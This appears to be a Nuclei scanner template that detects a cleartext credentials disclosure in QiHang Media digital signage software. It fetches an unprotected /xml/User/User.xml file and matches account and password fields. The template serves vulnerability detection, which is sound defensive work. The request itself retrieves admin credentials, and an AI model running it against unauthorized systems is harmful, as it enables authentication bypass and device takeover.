nuclei-templates/vulnerabilities/other/qihang-media-disclosure.yaml

24 lines
835 B
YAML

id: qihang-media-disclosure
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
author: gy741
severity: critical
description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
tags: qihang,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/xml/User/User.xml"
matchers:
- type: word
words:
- "<?xml version"
- "<Users>"
- "account="
- "password="
condition: and